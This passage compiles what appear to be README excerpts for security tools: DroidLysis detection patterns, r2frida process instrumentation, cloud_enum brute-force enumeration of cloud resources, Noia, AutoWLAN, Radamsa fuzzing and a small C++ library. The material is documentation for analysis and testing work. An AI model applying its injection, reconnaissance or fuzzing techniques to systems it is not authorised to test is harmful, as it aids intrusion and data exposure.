  • Libraries lib, assets assets
  • Disassembled Smali code: smali (and others)
  • Package meta information: META-INF
  • Package contents when simply unzipped in ./unzipped
  • DEX executable classes.dex (and others), and converted to jar: classes-dex2jar.jar, and unjarred in ./unjarred

The following files are generated by DroidLysis:

  • autoanalysis.md: lists each pattern DroidLysis detected and where.
  • report.md: same as what was printed on the console

If you do not need the sample output directory to be generated, use the option --clearoutput.

Import trackers from Exodus etc (--import-exodus)

$ python3 ./droidlysis3.py --import-exodus --verbose
Processing file: ./droidurl.pyc ...
DEBUG:droidconfig.py:Reading configuration file: './conf/./smali.conf'
DEBUG:droidconfig.py:Reading configuration file: './conf/./wide.conf'
DEBUG:droidconfig.py:Reading configuration file: './conf/./arm.conf'
DEBUG:droidconfig.py:Reading configuration file: '/home/axelle/.cache/droidlysis/./kit.conf'
DEBUG:droidproperties.py:Importing ETIP Exodus trackers from https://etip.exodus-privacy.eu.org/api/trackers/?format=json
DEBUG:connectionpool.py:Starting new HTTPS connection (1): etip.exodus-privacy.eu.org:443
DEBUG:connectionpool.py:https://etip.exodus-privacy.eu.org:443 "GET /api/trackers/?format=json HTTP/1.1" 200 None
DEBUG:droidproperties.py:Appending imported trackers to /home/axelle/.cache/droidlysis/./kit.conf

Trackers from Exodus which are not present in your initial kit.conf are appended to ~/.cache/droidlysis/kit.conf. Diff the 2 files and check what trackers you wish to add.

SQLite database

If you want to process a directory of samples, you'll probably want to store the properties DroidLysis found in a database, to easily parse and query the findings. In that case, use the option --enable-sql. This will automatically dump all results in a database named droidlysis.db, in a table named samples. Each entry in the table is relative to a given sample. Each column is a property DroidLysis tracks.

For example, to retrieve all filename, SHA256 sum and smali properties of the database:

sqlite> select sha256, sanitized_basename, smali_properties from samples;
f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290|Signalwebsiteuniversalrelease4.52.4.apk|{"send_sms": true, "receive_sms": true, "abort_broadcast": true, "call": false, "email": false, "answer_call": false, "end_call": true, "phone_number": false, "intent_chooser": true, "get_accounts": true, "contacts": false, "get_imei": true, "get_external_storage_stage": false, "get_imsi": false, "get_network_operator": false, "get_active_network_info": false, "get_line_number": true, "get_sim_country_iso": true,
...

Property patterns

What DroidLysis detects can be configured and extended in the files of the ./conf directory.

A pattern consists of:

  • a tag name: example send_sms. This is to name the property. Must be unique across the .conf file.
  • a pattern: this is a regexp to be matched. Ex: ;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage. In the smali.conf file, this regexp is matched against Smali code. In this particular case, there are 3 different ways to send SMS messages from the code: sendTextMessage, sendMultipartTextMessage and sendDataMessage.
  • a description (optional): explains the importance of the property and what it means.
[send_sms]
pattern=;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage
description=Sending SMS messages
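
Since the pattern is a plain regular expression, you can sanity-check a new entry before adding it to a .conf file. A quick sketch using the [send_sms] pattern above against a made-up Smali line:

import re

pattern = r";->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage"

# Hypothetical disassembled Smali line.
smali_line = "invoke-virtual {...}, Landroid/telephony/SmsManager;->sendTextMessage(...)V"

if re.search(pattern, smali_line):
    print("send_sms property detected")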

Importing Exodus Privacy Trackers

Exodus Privacy maintains a list of various SDKs which are interesting to rule out in our analysis via conf/kit.conf. Add option --import_exodus to the droidlysis command line: this will parse existing trackers Exodus Privacy knows and which aren't yet in your kit.conf. Finally, it will append all new trackers to ~/.cache/droidlysis/kit.conf.

Afterwards, you may want to sort your kit.conf file:

import configparser
import collections
import os

config = configparser.ConfigParser({}, collections.OrderedDict)
config.read(os.path.expanduser('~/.cache/droidlysis/kit.conf'))
# Order all sections alphabetically
config._sections = collections.OrderedDict(sorted(config._sections.items(), key=lambda t: t[0]))
with open('sorted.conf', 'w') as f:
    config.write(f)

Updates

  • v3.4.6 - Detecting manifest feature that automatically loads APK at install
  • v3.4.5 - Creating a writable user kit.conf file
  • v3.4.4 - Bug fix #14
  • v3.4.3 - Using configuration files
  • v3.4.2 - Adding import of Exodus Privacy Trackers
  • v3.4.1 - Removed dependency to Androguard
  • v3.4.0 - Multidex support
  • v3.3.1 - Improving detection of Base64 strings
  • v3.3.0 - Dumping data to JSON
  • v3.2.1 - IP address detection
  • v3.2.0 - Dex2jar is optional
  • v3.1.0 - Detection of Base64 strings


R2Frida - Radare2 And Frida Better Together


This is a self-contained plugin for radare2 that allows you to instrument remote processes using frida.

The radare project brings a complete toolchain for reverse engineering, providing well maintained functionalities and the ability to extend its features with other programming languages and tools.

Frida is a dynamic instrumentation toolkit that makes it easy to inspect and manipulate running processes by injecting your own JavaScript, and optionally also communicate with your scripts.


Features

  • Run unmodified Frida scripts (Use the :. command)
  • Execute snippets in C, Javascript or TypeScript in any process
  • Can attach, spawn or launch in local or remote systems
  • List sections, symbols, exports, protocols, classes, methods
  • Search for values in memory inside the agent or from the host
  • Replace method implementations or create hooks with short commands
  • Load libraries and frameworks in the target process
  • Support Dalvik, Java, ObjC, Swift and C interfaces
  • Manipulate file descriptors and environment variables
  • Send signals to the process, continue, breakpoints
  • The r2frida io plugin is also a filesystem fs and debug backend
  • Automate r2 and frida using r2pipe
  • Read/Write process memory
  • Call functions, syscalls and raw code snippets
  • Connect to frida-server via usb or tcp/ip
  • Enumerate apps and processes
  • Trace registers, arguments of functions
  • Tested on x64, arm32 and arm64 for Linux, Windows, macOS, iOS and Android
  • Doesn't require frida to be installed in the host (no need for frida-tools)
  • Extend the r2frida commands with plugins that run in the agent
  • Change page permissions, patch code and data
  • Resolve symbols by name or address and import them as flags into r2
  • Run r2 commands in the host from the agent
  • Use r2 apis and run r2 commands inside the remote target process.
  • Native breakpoints using the :db api
  • Access remote filesystems using the r_fs api.

Installation

The recommended way to install r2frida is via r2pm:

$ r2pm -ci r2frida

Binary builds that don't require compilation will soon be supported in r2pm and r2env. Meanwhile, feel free to download the latest builds from the Releases page.

Compilation

Dependencies

  • radare2
  • pkg-config (not required on windows)
  • curl or wget
  • make, gcc
  • npm, nodejs (will be soon removed)

In GNU/Debian you will need to install the following packages:

$ sudo apt install -y make gcc libzip-dev nodejs npm curl pkg-config git

Instructions

$ git clone https://github.com/nowsecure/r2frida.git
$ cd r2frida
$ make
$ make user-install

Windows

  • Install meson and Visual Studio
  • Unzip the latest radare2 release zip in the r2frida root directory
  • Rename it to radare2 (instead of radare2-x.y.z)
  • Run preconfigure.bat to make the VS compiler available in PATH
  • Run configure.bat and then make.bat
  • Copy b\r2frida.dll into the directory returned by r2 -H R2_USER_PLUGINS

Usage

For testing, use r2 frida://0, as attaching to pid 0 in Frida is a special session that runs locally. Now you can run the :? command to get the list of commands available.

$ r2 'frida://?'
r2 frida://[action]/[link]/[device]/[target]
* action = list | apps | attach | spawn | launch
* link = local | usb | remote host:port
* device = '' | host:port | device-id
* target = pid | appname | process-name | program-in-path | abspath
Local:
* frida://? # show this help
* frida:// # list local processes
* frida://0 # attach to frida-helper (no spawn needed)
* frida:///usr/local/bin/rax2 # abspath to spawn
* frida://rax2 # same as above, considering local/bin is in PATH
* frida://spawn/$(program) # spawn a new process in the current system
* frida://attach/(target) # attach to target PID in current host
USB:
* frida://list/usb// # list processes in the first usb device
* frida://apps/usb// # list apps in the first usb device
* frida://attach/usb//12345 # attach to given pid in the first usb device
* frida://spawn/usb//appname # spawn an app in the first resolved usb device
* frida://launch/usb//appname # spawn+resume an app in the first usb device
Remote:
* frida://attach/remote/10.0.0.3:9999/558 # attach to pid 558 on tcp remote frida-server
Environment: (Use the `%` command to change the environment at runtime)
R2FRIDA_SAFE_IO=0|1 # Workaround a Frida bug on Android/thumb
R2FRIDA_DEBUG=0|1 # Used to debug argument parsing behaviour
R2FRIDA_COMPILER_DISABLE=0|1 # Disable the new frida typescript compiler (`:. foo.ts`)
R2FRIDA_AGENT_SCRIPT=[file] # path to file of the r2frida agent

Examples

$ r2 frida://0     # same as frida -p 0, connects to a local session

You can attach, spawn or launch to any program by name or pid. The following line will attach to the first process named rax2 (run rax2 - in another terminal to test this line):

$ r2 frida://rax2  # attach to the first process named `rax2`
$ r2 frida://1234 # attach to the given pid

Using the absolute path of a binary to spawn will spawn the process:

$ r2 frida:///bin/ls
[0x00000000]> :dc # continue the execution of the target program

Also works with arguments:

$ r2 frida://"/bin/ls -al"

For USB debugging of iOS/Android apps, use these actions. Note that spawn can be replaced with launch or attach, and the process name can be the bundleid or the PID.

$ r2 frida://spawn/usb/         # enumerate devices
$ r2 frida://spawn/usb// # enumerate apps in the first iOS device
$ r2 frida://spawn/usb//Weather # Run the weather app

Commands

These are the most frequent commands, so you should learn them and suffix them with ? to get subcommand help.

:i        # get information of the target (pid, name, home, arch, bits, ..)
.:i* # import the target process details into local r2
:? # show all the available commands
:dm # list maps. Use ':dm|head' and seek to the program base address
:iE # list the exports of the current binary (seek)
:dt fread # trace the 'fread' function
:dt-* # delete all traces

Plugins

r2frida plugins run in the agent side and are registered with the r2frida.pluginRegister API.

See the plugins/ directory for some more example plugin scripts.

[0x00000000]> cat example.js
r2frida.pluginRegister('test', function(name) {
  if (name === 'test') {
    return function(args) {
      console.log('Hello Args From r2frida plugin', args);
      return 'Things Happen';
    }
  }
});
[0x00000000]> :. example.js # load the plugin script

The :. command works like the r2's . command, but runs inside the agent.

:. a.js  # run script which registers a plugin
:. # list plugins
:.-test # unload a plugin by name
:.. a.js # eternalize script (keeps running after detach)

Termux

If you are willing to install and use r2frida natively on Android via Termux, there are some caveats with the library dependencies because of some symbol resolutions. The way to make this work is by extending the LD_LIBRARY_PATH environment to point to the system directory before the termux libdir.

$ LD_LIBRARY_PATH=/system/lib64:$LD_LIBRARY_PATH r2 frida://...

Troubleshooting

Ensure you are using a modern version of r2 (preferably the last release or git).

Run r2 -L | grep frida to verify that the plugin is loaded; if nothing is printed, use the R2_DEBUG=1 environment variable to get some debugging messages to find out the reason.

If you have problems compiling r2frida you can use r2env or fetch the release builds from the GitHub releases page. Bear in mind that only the MAJOR.MINOR version must match; that is, r2-5.7.6 can load any plugin compiled on any version between 5.7.0 and 5.7.8.

Design

+---------+
| radare2 |   The radare2 tool, on top of the rest
+---------+
     :
+----------+
| io_frida |  r2frida io plugin
+----------+
     :
+-------+
| frida |    Frida host APIs and logic to interact with target
+-------+
     :
+-----+
| app |     Target process instrumented by Frida with Javascript
+-----+

Credits

This plugin has been developed by pancake aka Sergi Alvarez (the author of radare2) for NowSecure.

I would like to thank Ole André for writing and maintaining Frida, as well as being so kind to proactively fix bugs and discuss technical details on anything needed to make this union work. Kudos!



Cloud_Enum - Multi-cloud OSINT Tool. Enumerate Public Resources In AWS, Azure, And Google Cloud


Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.

Currently enumerates the following:

Amazon Web Services:
  • Open / Protected S3 Buckets
  • awsapps (WorkMail, WorkDocs, Connect, etc.)

Microsoft Azure:
  • Storage Accounts
  • Open Blob Storage Containers
  • Hosted Databases
  • Virtual Machines
  • Web Apps

Google Cloud Platform:
  • Open / Protected GCP Buckets
  • Open / Protected Firebase Realtime Databases
  • Google App Engine sites
  • Cloud Functions (enumerates project/regions with existing functions, then brute forces actual function names)
  • Open Firebase Apps


See it in action in Codingo's video demo here.


Usage

Setup

Several non-standard libraries are required to support threaded HTTP requests and DNS lookups. You'll need to install the requirements as follows:

pip3 install -r ./requirements.txt

Running

The only required argument is at least one keyword. You can use the built-in fuzzing strings, but you will get better results if you supply your own with -m and/or -b.

You can provide multiple keywords by specifying the -k argument multiple times.

Keywords are mutated automatically using strings from enum_tools/fuzz.txt or a file you provide with the -m flag. Services that require a second-level of brute forcing (Azure Containers and GCP Functions) will also use fuzz.txt by default or a file you provide with the -b flag.

Let's say you were researching "somecompany" whose website is "somecompany.io" that makes a product called "blockchaindoohickey". You could run the tool like this:

./cloud_enum.py -k somecompany -k somecompany.io -k blockchaindoohickey

HTTP scraping and DNS lookups use 5 threads each by default. You can try increasing this, but eventually the cloud providers will rate limit you. Here is an example to increase to 10:

./cloud_enum.py -k keyword -t 10

IMPORTANT: Some resources (Azure Containers, GCP Functions) are discovered per-region. To save time scanning, there is a "REGIONS" variable defined in cloudenum/azure_regions.py and cloudenum/gcp_regions.py that is set by default to use only 1 region. You may want to look at these files and edit them to be relevant to your own work.
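
As an illustration, REGIONS is just a Python list of region names, so a hypothetical edit to cloudenum/azure_regions.py to scan two regions instead of one could look like this:

# cloudenum/azure_regions.py (hypothetical edit)
REGIONS = ['eastus', 'westus2']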

Complete Usage Details

usage: cloud_enum.py [-h] -k KEYWORD [-m MUTATIONS] [-b BRUTE]

Multi-cloud enumeration utility. All hail OSINT!

optional arguments:
-h, --help show this help message and exit
-k KEYWORD, --keyword KEYWORD
Keyword. Can use argument multiple times.
-kf KEYFILE, --keyfile KEYFILE
Input file with a single keyword per line.
-m MUTATIONS, --mutations MUTATIONS
Mutations. Default: enum_tools/fuzz.txt
-b BRUTE, --brute BRUTE
List to brute-force Azure container names. Default: enum_tools/fuzz.txt
-t THREADS, --threads THREADS
Threads for HTTP brute-force. Default = 5
-ns NAMESERVER, --nameserver NAMESERVER
DNS server to use in brute-force.
-l LOGFILE, --logfile LOGFILE
Will APPEND found items to specified file.
-f FORMAT, --format FORMAT
Format for log file (text,json,csv - defaults to text)
--disable-aws Disable Amazon checks.
--disable-azure Disable Azure checks.
--disable-gcp Disable Google checks.
-qs, --quickscan Disable all mutations and second-level scans

Thanks

So far, I have borrowed from:

  • Some of the permutations from GCPBucketBrute



Rrgen - A Header Only C++ Library For Storing Safe, Randomly Generated Data Into Modern Containers


This library was developed to combat insecure methods of storing random data into modern C++ containers, such as old and clunky PRNGs. Thus, rrgen uses STL's distribution engines in order to efficiently and safely store a random number distribution into a given C++ container.


Installation

1) git clone https://github.com/josh0xA/rrgen.git
2) cd rrgen
3) make
4) Add include/rrgen.hpp to your project tree for access to the library classes and functions.

Official Documentation

rrgen/docs/index.rst

Supported Containers

1) std::vector<>
2) std::list<>
3) std::array<>
4) std::stack<>

Example Usages

#include "../include/rrgen.hpp"
#include <iostream>

int main(void)
{
// Example usage for rrgen vector
rrgen::rrand<float, std::vector, 10> rrvec;
rrvec.gen_rrvector(false, true, 0, 10);
for (auto &i : rrvec.contents())
{
std::cout << i << " ";
} // ^ the same as rrvec.show_contents()

// Example usage for rrgen list (frontside insertion)
rrgen::rrand<int, std::list, 10> rrlist;
rrlist.gen_rrlist(false, true, "fside", 5, 25);
std::cout << '\n'; rrlist.show_contents();
std::cout << "Size: " << rrlist.contents().size() << '\n';

// Example usage for rrgen array
rrgen::rrand_array<int, 5> rrarr;
rrarr.gen_rrarray(false, true, 5, 35);
for (auto &i : rrarr.contents())
{
std::cout << i << " ";
} // ^ the same as rrarr. show_contents()

// Example usage for rrgen stack
rrgen::rrand_stack<float, 10> rrstack;
rrstack.gen_rrstack(false, true, 200, 1000);
for (auto m = rrstack.xsize(); m > 0; m--)
{
std::cout << rrstack.grab_top() << " ";
rrstack.pop_off();
if (m == 1) { std::cout << '\n'; }
}
}

Note: This is a transferred repository, from a completely unrelated project.



Noia - Simple Mobile Applications Sandbox File Browser Tool


Noia is a web-based tool whose main aim is to ease the process of browsing mobile application sandboxes and directly previewing SQLite databases, images, and more. Powered by frida.re.

Please note that I'm not a programmer, but I'm probably above the median in code-savviness. Try it out, open an issue if you find any problems. PRs are welcome.


Installation & Usage

npm install -g noia
noia

Features

  • Explore third-party applications' files and directories. Noia shows you details including the access permissions, file type and much more.

  • View custom binary files. Directly preview SQLite databases, images, and more.

  • Search application by name.

  • Search files and directories by name.

  • Navigate to a custom directory using the ctrl+g shortcut.

  • Download the application files and directories for further analysis.

  • Basic iOS support

and more


Setup

Desktop requirements:

  • node.js LTS and npm
  • Any decent modern desktop browser

Noia is available on npm, so just type the following command to install it and run it:

npm install -g noia
noia

Device setup:

Noia is powered by frida.re, thus requires Frida to run.

Rooted Device

See: * https://frida.re/docs/android/ * https://frida.re/docs/ios/

Non-rooted Device

  • https://koz.io/using-frida-on-android-without-root/
  • https://github.com/sensepost/objection/wiki/Patching-Android-Applications
  • https://nowsecure.com/blog/2020/01/02/how-to-conduct-jailed-testing-with-frida/

Security Warning

This tool is not secure and may include some security vulnerabilities, so make sure to isolate the webpage from potential hackers.

LICENCE

MIT



AutoWLAN - Run A Portable Access Point On A Raspberry Pi Making Use Of Docker Containers


This project will allow you to run a portable access point on a Raspberry Pi making use of Docker containers.

Further reference and explanations:

https://fwhibbit.es/en/automatic-access-point-with-docker-and-raspberry-pi-zero-w

Tested on Raspberry Pi Zero W.


Access point configurations

You can customize the network password and other configurations on files at confs/hostapd_confs/. You can also add your own hostapd configuration files here.

Management using plain docker

Add --rm for volatile containers.

Create and run a container with default (Open) configuration (stop with Ctrl+C)
docker run --name autowlan_open --cap-add=NET_ADMIN --network=host  autowlan
Create and run a container with WEP configuration (stop with Ctrl+C)
docker run --name autowlan_wep --cap-add=NET_ADMIN --network=host -v $(pwd)/confs/hostapd_confs/wep.conf:/etc/hostapd/hostapd.conf autowlan
Create and run a container with WPA2 configuration (stop with Ctrl+C)
docker run --name autowlan_wpa2 --cap-add=NET_ADMIN --network=host -v $(pwd)/confs/hostapd_confs/wpa2.conf:/etc/hostapd/hostapd.conf autowlan
Stop a running container
docker stop autowlan_{open|wep|wpa2}

Management using docker-compose

Create and run container (stop with Ctrl+C)
docker-compose -f <yaml_file> up
Create and run container in the background
docker-compose -f <yaml_file> up -d
Stop a container in the background
docker-compose -f <yaml_file> down
Read logs of a container in the background
docker-compose -f <yaml_file> logs
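
For example, assuming a compose file named wpa2.yml exists for the WPA2 configuration (hypothetical file name):

docker-compose -f wpa2.yml up -d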


Radamsa - A General-Purpose Fuzzer


Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestingly different outputs from them. The main selling points of radamsa are that it has already found a slew of bugs in programs that actually matter, it is easily scriptable, and it is easy to get up and running.


Nutshell:

 $ # please please please fuzz your programs. here is one way to get data for it:
$ sudo apt-get install gcc make git wget
$ git clone https://gitlab.com/akihe/radamsa.git && cd radamsa && make && sudo make install
$ echo "HAL 9000" | radamsa

What the Fuzz

Programming is hard. All nontrivial programs have bugs in them. What's more, in some of the most widely used programming languages even the simplest typical mistakes are usually enough for attackers to gain undesired powers.

Fuzzing is one of the techniques to find such unexpected behavior in programs. The idea is simply to subject the program to various kinds of inputs and see what happens. There are two parts to this process: getting the various kinds of inputs, and seeing what happens. Radamsa is a solution to the first part, and the second part is typically a short shell script. Testers usually have a more or less vague idea of what should not happen, and they try to find out whether this is so. This kind of testing is often referred to as negative testing, being the opposite of positive unit or integration testing. Developers know a service should not crash, should not consume exponential amounts of memory, should not get stuck in an infinite loop, etc. Attackers know that they can probably turn certain kinds of memory safety bugs into exploits, so they typically fuzz instrumented versions of the target programs and wait for such errors to be found. In theory, the idea is to disprove, by finding a counterexample, a theorem about the program stating that for all inputs something doesn't happen.

There are many kinds of fuzzers and ways to apply them. Some trace the target program and generate test cases based on the behavior. Some need to know the format of the data and generate test cases based on that information. Radamsa is an extremely "black-box" fuzzer, because it needs no information about the program nor the format of the data. One can pair it with coverage analysis during testing to likely improve the quality of the sample set during a continuous test run, but this is not mandatory. The main goal is to first get tests running easily, and then refine the technique applied if necessary.

Radamsa is intended to be a good general purpose fuzzer for all kinds of data. The goal is to be able to find issues no matter what kind of data the program processes, whether it's xml or mp3, and conversely that not finding bugs implies that other similar tools likely won't find them either. This is accomplished by having various kinds of heuristics and change patterns, which are varied during the tests. Sometimes there is just one change, sometimes there is a slew of them, sometimes there are bit flips, sometimes something more advanced and novel.

Radamsa is a side-product of OUSPG's Protos Genome Project, in which some techniques to automatically analyze and examine the structure of communication protocols were explored. A subset of one of the tools turned out to be a surprisingly effective file fuzzer. The first prototype black-box fuzzer tools mainly used regular and context-free formal languages to represent the inferred model of the data.

Requirements

Supported operating systems:

  • GNU/Linux
  • OpenBSD
  • FreeBSD
  • Mac OS X
  • Windows (using Cygwin)

Software requirements for building from sources:

  • gcc / clang
  • make
  • git
  • wget

Building Radamsa

 $ git clone https://gitlab.com/akihe/radamsa.git
$ cd radamsa
$ make
$ sudo make install # optional, you can also just grab bin/radamsa
$ radamsa --help

Radamsa itself is just a single binary file which has no external dependencies. You can move it where you please and remove the rest.

Fuzzing with Radamsa

This section assumes some familiarity with UNIX scripting.

Radamsa can be thought of as the cat UNIX tool, which manages to break the data in often interesting ways as it flows through. It also has support for generating more than one output at a time and for acting as a TCP server or client, in case such things are needed.

Use of radamsa will be demonstrated by means of small examples. We will use the bc arbitrary precision calculator as an example target program.

In the simplest case, from a scripting point of view, radamsa can be used to fuzz data going through a pipe.

 $ echo "aaa" | radamsa
aaaa

Here radamsa decided to add one 'a' to the input. Let's try that again.

 $ echo "aaa" | radamsa
ːaaa

Now we got another result. By default radamsa will grab a random seed from /dev/urandom if it is not given a specific random state to start from, and you will generally see a different result every time it is started, though for small inputs you might see the same or the original fairly often. The random state to use can be given with the -s parameter, which is followed by a number. Using the same random state will result in the same data being generated.

 $ echo "Fuzztron 2000" | radamsa --seed 4
Fuzztron 4294967296

This particular example was chosen because radamsa happens to choose to use a number mutator, which replaces textual numbers with something else. Programmers might recognize why for example this particular number might be an interesting one to test for.
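
Seed reproducibility is also easy to verify from a script. Here is a minimal Python sketch (assuming radamsa is on the PATH) that runs the same seeded mutation twice and checks that the outputs match:

import subprocess

# Same input and same seed should yield byte-identical output.
out1 = subprocess.run(["radamsa", "--seed", "4"],
                      input=b"Fuzztron 2000", capture_output=True).stdout
out2 = subprocess.run(["radamsa", "--seed", "4"],
                      input=b"Fuzztron 2000", capture_output=True).stdout
assert out1 == out2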

You can generate more than one output by using the -n parameter as follows:

 $ echo "1 + (2 + (3 + 4))" | radamsa --seed 12 -n 4
1 + (2 + (2 + (3 + 4?)
1 + (2 + (3 +?4))
18446744073709551615 + 4)))
1 + (2 + (3 + 170141183460469231731687303715884105727))

There is no guarantee that all of the outputs will be unique. However, when using nontrivial samples, equal outputs tend to be extremely rare.

What we have so far can be used, for example, to test programs that read input from standard input, as in

 $ echo "100 * (1 + (2 / 3))" | radamsa -n 10000 | bc
[...]
(standard_in) 1418: illegal character: ^_
(standard_in) 1422: syntax error
(standard_in) 1424: syntax error
(standard_in) 1424: memory exhausted
[hang]

Or the compiler used to compile Radamsa:

 $ echo '((lambda (x) (+ x 1)) #x124214214)' | radamsa -n 10000 | ol
[...]
> What is 'ó µ'?
4901126677
> $

Or to test decompression:

 $ gzip -c /bin/bash | radamsa -n 1000 | gzip -d > /dev/null

Typically, however, one might want a separate run of the program for each output. Basic shell scripting makes this easy. Usually we want a test script to run continuously, so we'll use an infinite loop here:

 $ gzip -c /bin/bash > sample.gz
$ while true; do radamsa sample.gz | gzip -d > /dev/null; done

Notice that here we are giving the sample as a file instead of running Radamsa in a pipe. Like cat, Radamsa will by default write the output to stdout, but unlike cat, when given more than one file it will usually use only one or a few of them to create one output. This test will keep throwing fuzzed data at gzip, but doesn't care what happens then. One simple way to find out whether something bad happened to a (simple single-threaded) program is to check whether the exit value is greater than 127, which would indicate a fatal program termination. This can be done for example as follows:

 $ gzip -c /bin/bash > sample.gz
$ while true
do
radamsa sample.gz > fuzzed.gz
gzip -dc fuzzed.gz > /dev/null
test $? -gt 127 && break
done

This will run for as long as it takes to crash gzip, which hopefully is no longer even possible, and fuzzed.gz can be used to check the issue if the script has stopped. We have found a few such cases, the last of which took about 3 months to find, but all of them have as usual been filed as bugs and promptly fixed upstream.
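
The same crash-hunting loop can also be written in Python. Note that Python's subprocess reports death by signal as a negative return code, which is what the shell's exit value being greater than 127 indicates. A minimal sketch, assuming radamsa and gzip are installed and sample.gz exists:

import subprocess

# Repeatedly fuzz sample.gz and feed the result to gzip -d,
# stopping when gzip is killed by a signal (fatal termination).
while True:
    fuzzed = subprocess.run(["radamsa", "sample.gz"],
                            capture_output=True).stdout
    with open("fuzzed.gz", "wb") as f:
        f.write(fuzzed)
    proc = subprocess.run(["gzip", "-dc", "fuzzed.gz"],
                          stdout=subprocess.DEVNULL,
                          stderr=subprocess.DEVNULL)
    if proc.returncode < 0:
        break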

One thing to note is that since most of the outputs are based on data in the given samples (standard input or files given on the command line), it is usually a good idea to try to find good samples, and preferably more than one of them. In a more real-world test script radamsa will usually be used to generate more than one output at a time based on tens or thousands of samples, and the consequences of the outputs are tested mostly in parallel, often by giving each of the outputs on the command line to the target program. We'll make a simple such script for bc, which accepts files from the command line. The -o flag can be used to give a file name to which radamsa should write the output instead of standard output. If more than one output is generated, the path should have a %n in it, which will be expanded to the number of the output.

 $ echo "1 + 2" > sample-1
$ echo "(124 % 7) ^ 1*2" > sample-2
$ echo "sqrt((1 + length(10^4)) * 5)" > sample-3
$ bc sample-* < /dev/null
3
10
5
$ while true
do
radamsa -o fuzz-%n -n 100 sample-*
bc fuzz-* < /dev/null
test $? -gt 127 && break
done

This will again run until something obviously interesting happens, as indicated by a large exit value, or until the target program gets stuck.

In practice many programs fail in unique ways. Some common ways to catch obvious errors are to check the exit value; enable fatal signal printing in the kernel and check whether something new turns up in dmesg; run the program under strace, gdb or valgrind and see if something interesting is caught; or check whether an error reporter process has been started after starting the program.

Output Options

The examples above all either wrote to standard output or files. One can also ask radamsa to be a TCP client or server by using a special parameter to -o. The output patterns are:

-o argument | meaning | example
:port | act as a TCP server on the given port | radamsa -o :80 -n inf samples/*.http-resp
ip:port | connect as a TCP client to the given port of ip | radamsa -o 127.0.0.1:80 -n inf samples/*.http-req
- | write to stdout | radamsa -o - samples/*.vt100
path | write to files; %n is the testcase number and %s the first suffix | radamsa -o test-%n.%s -n 100 samples/*.foo

Remember that you can use e.g. tcpflow to record TCP traffic to files, which can then be used as samples for radamsa.

Related Tools

A non-exhaustive list of free complementary tools:

  • GDB (http://www.gnu.org/software/gdb/)
  • Valgrind (http://valgrind.org/)
  • AddressSanitizer (http://code.google.com/p/address-sanitizer/wiki/AddressSanitizer)
  • strace (http://sourceforge.net/projects/strace/)
  • tcpflow (http://www.circlemud.org/~jelson/software/tcpflow/)

A non-exhaustive list of related free tools:

  • American fuzzy lop (http://lcamtuf.coredump.cx/afl/)
  • Zzuf (http://caca.zoy.org/wiki/zzuf)
  • Bunny the Fuzzer (http://code.google.com/p/bunny-the-fuzzer/)
  • Peach (http://peachfuzzer.com/)
  • Sulley (http://code.google.com/p/sulley/)

Tools which are intended to improve security are usually complementary and should be used in parallel to improve the results. Radamsa aims to be an easy-to-set-up, general purpose shotgun test that exposes the easiest (and often severe, due to being reachable via input streams) cracks which might be exploitable by getting the program to process malicious data. It has also turned out to be useful for catching regressions when combined with continuous automatic testing.

Some Known Results

A robustness testing tool is obviously only good if it really can find non-trivial issues in real-world programs. Being a University-based group, we have tried to formulate some more scientific approaches to define what a 'good fuzzer' is, but real users are more likely to be interested in whether a tool has found something useful. We do not have anyone at OUSPG running tests or even developing Radamsa full-time, but we obviously do make occasional test-runs, both to assess the usefulness of the tool, and to help improve robustness of the target programs. For the test-runs we try to select programs that are mature, useful to us, widely used, and, preferably, open source and/or tend to process data from outside sources.

The list below has some CVEs we know of that have been found by using Radamsa. Some of the results are from our own test runs, and some have been kindly provided by CERT-FI from their tests and by other users. As usual, please note that CVEs should be read as 'product X is now more robust (against Y)'.

CVE program credit
CVE-2007-3641 libarchive OUSPG
CVE-2007-3644 libarchive OUSPG
CVE-2007-3645 libarchive OUSPG
CVE-2008-1372 bzip2 OUSPG
CVE-2008-1387 ClamAV OUSPG
CVE-2008-1412 F-Secure OUSPG
CVE-2008-1837 ClamAV OUSPG
CVE-2008-6536 7-zip OUSPG
CVE-2008-6903 Sophos Anti-Virus OUSPG
CVE-2010-0001 Gzip integer underflow in unlzw
CVE-2010-0192 Acroread OUSPG
CVE-2010-1205 libpng OUSPG
CVE-2010-1410 Webkit OUSPG
CVE-2010-1415 Webkit OUSPG
CVE-2010-1793 Webkit OUSPG
CVE-2010-2065 libtiff found by CERT-FI
CVE-2010-2443 libtiff found by CERT-FI
CVE-2010-2597 libtiff found by CERT-FI
CVE-2010-2482 libtiff found by CERT-FI
CVE-2011-0522 VLC found by Harry Sintonen
CVE-2011-0181 Apple ImageIO found by Harry Sintonen
CVE-2011-0198 Apple Type Services found by Harry Sintonen
CVE-2011-0205 Apple ImageIO found by Harry Sintonen
CVE-2011-0201 Apple CoreFoundation found by Harry Sintonen
CVE-2011-1276 Excel found by Nicolas Grégoire of Agarri
CVE-2011-1186 Chrome OUSPG
CVE-2011-1434 Chrome OUSPG
CVE-2011-2348 Chrome OUSPG
CVE-2011-2804 Chrome/pdf OUSPG
CVE-2011-2830 Chrome/pdf OUSPG
CVE-2011-2839 Chrome/pdf OUSPG
CVE-2011-2861 Chrome/pdf OUSPG
CVE-2011-3146 librsvg found by Sauli Pahlman
CVE-2011-3654 Mozilla Firefox OUSPG
CVE-2011-3892 Theora OUSPG
CVE-2011-3893 Chrome OUSPG
CVE-2011-3895 FFmpeg OUSPG
CVE-2011-3957 Chrome OUSPG
CVE-2011-3959 Chrome OUSPG
CVE-2011-3960 Chrome OUSPG
CVE-2011-3962 Chrome OUSPG
CVE-2011-3966 Chrome OUSPG
CVE-2011-3970 libxslt OUSPG
CVE-2012-0449 Firefox found by Nicolas Grégoire of Agarri
CVE-2012-0469 Mozilla Firefox OUSPG
CVE-2012-0470 Mozilla Firefox OUSPG
CVE-2012-0457 Mozilla Firefox OUSPG
CVE-2012-2825 libxslt found by Nicolas Grégoire of Agarri
CVE-2012-2849 Chrome/GIF OUSPG
CVE-2012-3972 Mozilla Firefox found by Nicolas Grégoire of Agarri
CVE-2012-1525 Acrobat Reader found by Nicolas Grégoire of Agarri
